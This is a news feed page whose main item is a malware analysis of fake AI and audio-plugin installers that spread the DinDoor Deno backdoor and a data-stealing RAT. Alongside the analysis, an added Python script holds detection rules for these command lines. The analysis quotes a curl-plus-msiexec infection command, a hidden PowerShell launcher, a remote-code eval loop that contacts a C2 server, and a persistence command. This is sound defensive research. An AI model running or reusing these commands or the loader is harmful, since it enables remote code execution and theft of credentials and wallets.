Feed aggregator
What Color is Your Function? (2015)
Article URL: https://journal.stuffwithstuff.com/2015/02/01/what-color-is-your-function/
Comments URL: https://news.ycombinator.com/item?id=48281515
Points: 3
# Comments: 0
Polar: Agentic RL on Any Harness at Scale
Article URL: https://arxiv.org/abs/2605.24220
Comments URL: https://news.ycombinator.com/item?id=48281514
Points: 1
# Comments: 0
Uber, Lyft drivers in Massachusetts form first US ride-share union
Show HN: Vibeshub – Git for your vibe code transcripts
My colleagues all use Claude Code to generate the PRs, but while reviewing I only have a large block of code diff, and a single comment making it tough for me to make sense out of the diff.
Moreover, there was no shared knowledge base of vibes amongst the team, nor a way to revisit one's own reasoning later. I realised that just the code is not enough context, and that's why I built Vibeshub.
It's a Claude Code plugin which auto uploads the transcript, and posts the comment on the PR with a link pointing towards it on vibeshub. The link contains a much more readable version of your chat, making it easy to skim, review, knowledge share for your teammates.
The repo used to build this (https://github.com/vibeshub/vibeshub) is the first customer of this product. Feel free to explore some PRs and traces here https://vibeshub.ai/vibeshub/vibeshub
Would love to hear from folks if you've faced similar issues when vibe-collaborating, and if this fits into your current workflow. Happy to answer any questions here, or shoot them my way at bhavya@vibeshub.ai
Comments URL: https://news.ycombinator.com/item?id=48281494
Points: 1
# Comments: 0
Pentagon spars with SpaceX over Starlink price hike during Iran war
GitHub Copilot is experiencing degraded performance
Article URL: https://www.githubstatus.com/incidents/xflkh26pm7vv
Comments URL: https://news.ycombinator.com/item?id=48281489
Points: 2
# Comments: 1
How the West Could Turn a Trickle of Water into an Endless Supply
Article URL: https://reasonstobecheerful.world/water-recycling-interview/
Comments URL: https://news.ycombinator.com/item?id=48281468
Points: 1
# Comments: 0
Supreme Court sides with Trump fight tied to speech curbs on immigration judges
Article URL: https://www.reuters.com/world/supreme-court-sides-with-trump-fight-tied-speech-curbs-immigration-judges-2026-05-26/
Comments URL: https://news.ycombinator.com/item?id=48281464
Points: 2
# Comments: 0
The Theoretical Upper Limits of the Stock Market
Article URL: https://jackmaguire.org/blog/theoretical-upper-limit-us-stock-market/
Comments URL: https://news.ycombinator.com/item?id=48281457
Points: 1
# Comments: 0
Germany news: Childfree adults to pay more for elder care
Article URL: https://www.dw.com/en/germany-news-childfree-adults-to-pay-more-for-elder-care/live-77292208
Comments URL: https://news.ycombinator.com/item?id=48281453
Points: 8
# Comments: 0
Crowbuster – saving young birds from crows
Article URL: https://github.com/utsengar/crowbuster
Comments URL: https://news.ycombinator.com/item?id=48281443
Points: 1
# Comments: 0
Making a 3D terrain look like pixel-art – at every zoom level
Article URL: https://www.miximum.fr/revivarium/blog/godot-pixel-art-texture/
Comments URL: https://news.ycombinator.com/item?id=48281415
Points: 2
# Comments: 0
Brazilian platform provider VTEX is pushing hard into Europe with bold claims around artificial intelligence, but how relevant is that pitch for European CIOs?
AppOmni’s Marlin AI Brings Autonomous Investigation to SaaS Security
Marlin AI automatically analyzes SaaS misconfigurations, investigates related activity across enterprise environments, and recommends remediation steps — while stopping short of fully autonomous corrective action.
The post AppOmni’s Marlin AI Brings Autonomous Investigation to SaaS Security appeared first on SecurityWeek.
Iranian APT Targets Aviation, Software Companies With Updated Tools
Nimbus Manticore has continued its operations during and after the US military campaign against Iran.
The post Iranian APT Targets Aviation, Software Companies With Updated Tools appeared first on SecurityWeek.
Fake software on GitHub and SourceForge distribute Deno RAT
During our threat hunting activities, we found fake installers and plugins impersonating popular software including ChatGPT, Claude, AutoTune, and Kontakt on GitHub and SourceForge distributing a Deno backdoor known as DinDoor. Attackers are using compromised YouTube channels to distribute links to these platforms.
DinDoor ultimately drops different types of malware, including a stealthy remote access Trojan (RAT), which also uses the Deno JavaScript runtime.
Attackers are increasingly abusing alternative JavaScript runtimes like Bun and Deno to bypass traditional detection methods. In one of our recent investigations we documented how attackers are using Bun as an initial infection vector to distribute NWHStealer. And in March, ThreatDown researchers also observed attackers using Deno to deliver CastleLoader through a multi-stage infection chain involving the ClickFix lure.
These campaigns use Scoop (an alternative installer for Windows) and WinGet (the official Windows package manager) to install Deno on the victim’s machine. They then use the Deno runtime to execute a RAT that can run additional payloads and exfiltrate data from browsers, wallets, and other applications, and that has an interesting peer-to-peer feature using Edge to hide malicious traffic.
Legitimate platforms abused to spread malware
In most of the analyzed cases, the infection chain starts with MSI files or PowerShell scripts downloaded from GitHub or SourceForge. Users are usually redirected to these malicious repositories via compromised YouTube channels. These videos currently total more than 50,000 views.
Compromised YouTube channels with AI-generated videos
The compromised YouTube channels create posts promoting different software and constantly switch between GitHub accounts to distribute the malware.
YouTube posts linking to the malicious GitHub repositories
The fake software appears designed to target creators, AI enthusiasts, gamers, and technically inclined users who are more likely to download unofficial tools, cracked software, or community-distributed installers from sites like GitHub and SourceForge. We’ve observed fake MSIs and scripts masquerading as installers and plugins for legitimate software and brands such as ChatGPT, Claude, ZENOLOGY, Ableton Live, AutoTune, and Kontakt.
GitHub repository for fake ChatGPT installer
The malicious repositories provide a command for both Windows and macOS. They ask users to open the terminal and paste the malicious command, which downloads and executes the MSI from GitHub.
Fake plugin that asks the user to copy and execute the malicious command
Malicious GitHub accounts create multiple repositories filled with fake software and plugins related to popular software to lure in more users.
GitHub account with different malicious repositories
We found that the same backdoor was distributed through SourceForge, mimicking legitimate game software called GearUP and an AI watermark remover called BWR.
The malicious MSI files hosted on SourceForge
How to stay safe
The attackers relied heavily on trust. GitHub and SourceForge are legitimate platforms, which makes fake projects look more convincing. We contacted GitHub, which quickly removed the malicious repositories, but users should expect new ones to continue appearing.
Here are a few simple ways to stay safe:
- Only download software from official vendor websites.
- Be skeptical of “free”, cracked, or unofficial versions of paid software.
- Be cautious with downloads from GitHub, SourceForge, forums, or file-sharing sites, especially from new or unknown accounts.
- Attackers continue to create new profiles to distribute this malware across platforms. Check the developer or publisher’s profile, its reputation, and how recently it was created before downloading anything.
- Check that archive contents, images, and text files align with what you expected to download. Archive names and structures often follow recognizable malicious patterns.
- Check the file’s publisher and digital signature before you run it. On Windows, you can usually check this by right-clicking the file and selecting Properties > Digital Signatures. Keep in mind that a valid signature does not guarantee a file is safe, but missing or suspicious signatures are often a red flag.
The malicious GitHub repositories ask the user to open cmd and execute a malicious command. The malicious commands download an MSI from GitHub and install it via msiexec. These repositories sometimes also contain PowerShell scripts to similarly initiate the infection chain.
Example of a malicious command hosted on GitHub that starts the infection chain:
curl -Lo %temp%\s.msi https://raw.githubusercontent.com/claude-free-plugin/install/main/install.msi && msiexec /i %temp%\s.msi
The MSI drops a CMD file and a PowerShell script in a random directory specified in the MSI InstallationFolder and registry values. We detected different structures for these MSIs, with JavaScript instead of the CMD file, or with additional embedded files.
The “Ps1File” and “CmdFile” inside the MSI dropper
The CMD file executes the PowerShell script, whose name changes between the analyzed infection chains:
@set "SCRIPTDIR=%~dp0"
@powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Start-Process powershell -ArgumentList ('-NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File ""' + $env:SCRIPTDIR + '{Random name}.ps1""') -WindowStyle Hidden"
The executed PowerShell script
The PowerShell script takes care of:
- Ensuring the package manager Scoop is installed, installing it if missing with the official script from get.scoop.sh. Scoop is a popular, open-source command-line software installer and package manager for Microsoft Windows.
- Using Scoop to install WinGet (Windows Package Manager) if missing.
- Installing Deno (a JavaScript/TypeScript runtime) via WinGet or Scoop if not present.
The usage of the package managers Scoop and WinGet to install additional software on the compromised machine is an interesting approach that gives the attacker more flexibility.
Command executed to install Deno using WinGet:
"C:\Users\admin\scoop\apps\winget\current\winget.exe" install --id DenoLand.Deno -e --accept-source-agreements --accept-package-agreements --silent
The DinDoor Backdoor
Next, the following stage is executed with the downloaded Deno executable:
"C:\Users\admin\AppData\Local\Microsoft\WinGet\Packages\DenoLand.Deno_Microsoft.Winget.Source_8wekyb3d8bbwe\deno.exe" run -A http://{C2}/{random_path}.js
The returned code (internal name “launcher-1”) is a small eval loop that downloads the next stage (internal name “launcher-2”). The downloaded backdoor is publicly known as DinDoor.
var a="{C2}".split(","),i=0;for(;;){let e=null;try{let t=await fetch(a[i%a.length]+"/{BUILD_ID}.js");if(!t.ok)throw 0;e=await t.text()}catch{i++,await new Promise(t=>setTimeout(t,5e3));continue}try{await(0,eval)("(async()=>{"+e+"})()")}catch{}await new Promise(t=>setTimeout(t,3e4))}
The backdoor handles persistence, sends information about the compromised system to the command-and-control server (C2), and executes additional payloads and commands returned by the C2. The HTTP endpoints used for C2 communications vary between the analyzed cases.
The backdoor obtains an ID from an HTTP endpoint (for example, /security-pool) and then uses that ID to obtain the next stage from /v2{ID}.js.
The obtained stage is executed via stdin without being written to disk, using the command:
deno run -A --no-check -
To achieve persistence, the backdoor runs a PowerShell command to create a Run key that executes the downloader “launcher-1” used previously:
conhost.exe --headless "<deno.exe>" -A "%APPDATA%\<hash>.js"
This backdoor distributes several malware families in the analyzed cases. In this blog, we analyze one of the distributed payloads: a RAT that uses the Deno JavaScript runtime.
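As an added example (not code from the Malwarebytes post or from any of the tools it describes), here is a small Python detection pass that runs rules for each stage of the chain described above over constructed process-creation events. The event shape (image, parent image, command line), the example host c2.example and the local paths are assumptions; the rule patterns follow only the command lines quoted in the post.

```python
import re

# Constructed Sysmon-style process-creation events, not real telemetry: the
# command lines mirror the stages described above, with example hosts/paths.
EVENTS = [
    {"image": "cmd.exe", "parent": "explorer.exe", "cmdline":
     r"curl -Lo %temp%\s.msi https://raw.githubusercontent.com/EXAMPLE/x/main/install.msi && msiexec /i %temp%\s.msi"},
    {"image": "powershell.exe", "parent": "cmd.exe", "cmdline":
     r"powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\ProgramData\x\a.ps1"},
    {"image": "winget.exe", "parent": "powershell.exe", "cmdline":
     "winget.exe install --id DenoLand.Deno -e --accept-source-agreements --accept-package-agreements --silent"},
    {"image": "deno.exe", "parent": "powershell.exe", "cmdline": "deno.exe run -A http://c2.example/abc.js"},
    {"image": "deno.exe", "parent": "deno.exe", "cmdline": "deno run -A --no-check -"},
    {"image": "conhost.exe", "parent": "explorer.exe", "cmdline":
     r'conhost.exe --headless "C:\Users\u\scoop\apps\deno\current\deno.exe" -A "%APPDATA%\deadbeef.js"'},
    {"image": "deno.exe", "parent": "powershell.exe", "cmdline": r"deno run -A .\build.ts"},  # benign dev use
]

# (rule name, image regex or None, parent-image regex or None, command-line regex)
RULES = [
    ("msi_from_github_to_temp", None, None,
     r"raw\.githubusercontent\.com\S*\.msi.*msiexec\s+/i\s+%temp%"),
    ("hidden_bypass_powershell_from_cmd", r"powershell", r"cmd\.exe",
     r"-ExecutionPolicy\s+Bypass.*-WindowStyle\s+Hidden.*-File"),
    ("silent_deno_install_via_winget", r"winget", None,
     r"install\s+--id\s+DenoLand\.Deno.*--silent"),
    # Deno told to run a script fetched over HTTP(S) with all permissions (-A).
    ("deno_runs_remote_script", r"deno", None, r"\brun\s+-A\s+https?://"),
    # Deno reading the script from stdin ("-"), so nothing touches disk.
    ("deno_runs_script_from_stdin", r"deno", None, r"\brun\s+-A\s+--no-check\s+-\s*$"),
    # Run-key persistence: headless conhost wrapping deno.exe with a script in %APPDATA%.
    ("headless_conhost_launches_deno", r"conhost", None,
     r'--headless\s+"?.*deno\.exe.*-A\s+"?%APPDATA%'),
]


def match_rules(event):
    """Return the names of every rule the event satisfies (empty list if none)."""
    def ok(pattern, text):
        return pattern is None or re.search(pattern, text, re.I) is not None
    return [name for name, img, par, cmd in RULES
            if ok(img, event["image"]) and ok(par, event["parent"]) and ok(cmd, event["cmdline"])]


def triage(events):
    """Map each fired rule name to how many events triggered it."""
    counts = {}
    for ev in events:
        for name in match_rules(ev):
            counts[name] = counts.get(name, 0) + 1
    return counts
```

The last constructed event (a local `deno run -A .\build.ts`) is there to show that ordinary developer use of Deno does not fire any rule; only the remote-URL, stdin and headless-conhost forms do.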
Deno RAT
The delivered RAT, like the other analyzed scripts, uses the Deno JavaScript environment and has full functionality to control the device, execute commands and payloads, and exfiltrate various types of data through its built-in stealer module.
We did not find a specific name or attribution for this RAT. In the past, the RAT has been referred to as “Smokest” based on a specific value in the config. The similar commenting style and shared infrastructure suggest that the DinDoor developer and the RAT developer may be the same person or team.
In addition to HTTP for C2 communication, the RAT also supports WebSocket communication, enabled when the JSON value isLiveEnabled returned from the C2 is set to true.
The main function of the Deno RAT
The RAT supports different commands (exec, exec-ps, exec-sc, sysinfo, screenshot, stealer) and functionality:
- Collect system information about the compromised device
- Full bidirectional control through a custom VNC implementation over WebSocket
- Target more than 50 crypto wallet extensions and 10 crypto software folders such as Atomic Wallet, Exodus, Electrum, and ByteCoin
- Collect data from browsers including Chrome, Chromium, Brave, Edge, Avast Browser, Opera, Vivaldi, CentBrowser, Kometa, Orbitum, 360Browser, and Chromodo
- Exfiltrate Telegram, Discord, and Lightcord data
- Record and modify clipboard data
- List folders, files and exfiltrate content from files with specific extensions
- Capture screenshots using different methods
- Execute additional payloads
- Launch or terminate arbitrary processes
- Execute commands with PowerShell
- Establish SOCKS5 proxy tunnels over WebSocket
One of the most interesting parts of the RAT is a peer-to-peer streaming mode that uses the Edge browser to hide traffic and make detection more difficult.
To stream live video directly to the operator without routing it through the C2 server, the RAT spawns a hidden Microsoft Edge process and connects to it via Chrome DevTools Protocol (CDP). It then injects a small WebRTC HTML page into Edge, turning the legitimate browser into a peer-to-peer video relay. The Deno agent captures and H.264-encodes the victim’s screen, passes the frames to the Edge page over CDP, and Edge forwards them directly to the operator’s browser over an encrypted WebRTC DataChannel. SDP and ICE signaling, needed to establish the direct connection, is exchanged through the existing C2 WebSocket.
The injected HTML page inside the Edge browser
The RAT uses the following endpoints for C2 communication, which can vary between samples:
- /health: checks the “ok” response from the C2
- /token: receives config parameters, task delivery, results, and exfiltrated data
- /vnc/agent/: WebSocket path used for VNC communication
The config data is Base64-encoded and is sent in communications with the C2 as an authorization token. Decoded config data:
{ "buildId": "cd361ef3159f5ce9", "buildNote": "BWR", "buildType": "msi-v2", "proxyUrls": ["{C2}"], "userId": "…", "accessTokenHash": "…", "iat": 1779372546, "exp": 2094948546 }
We found different versions of this RAT, including a “light” version called “agent-lite” that supports only a few commands and uses Cloudflare Workers for C2 communication.
The “light” version of the RAT
Acknowledgements
- DinDoor: https://hunt.io/blog/dindoor-deno-runtime-backdoor-msi-analysis
- Smokest: https://x.com/vxunderground/status/2013006601133687004
Is the Fitbit Air a Smartwatch Killer? I Tested It for 2 Weeks to Find Out
I've Used GoPro's Mission 1 Pro. Here's What You Should Know
'I had to guard an empty room': the rise of the pointless job (2020)
Article URL: https://davidgraeber.org/articles/i-had-to-guard-an-empty-room/
Comments URL: https://news.ycombinator.com/item?id=48279189
Points: 1
# Comments: 0
You Live in an Illusion. Get over It
Article URL: https://www.amazingcto.com/ai-the-next-absorption-event/
Comments URL: https://news.ycombinator.com/item?id=48279185
Points: 1
# Comments: 0
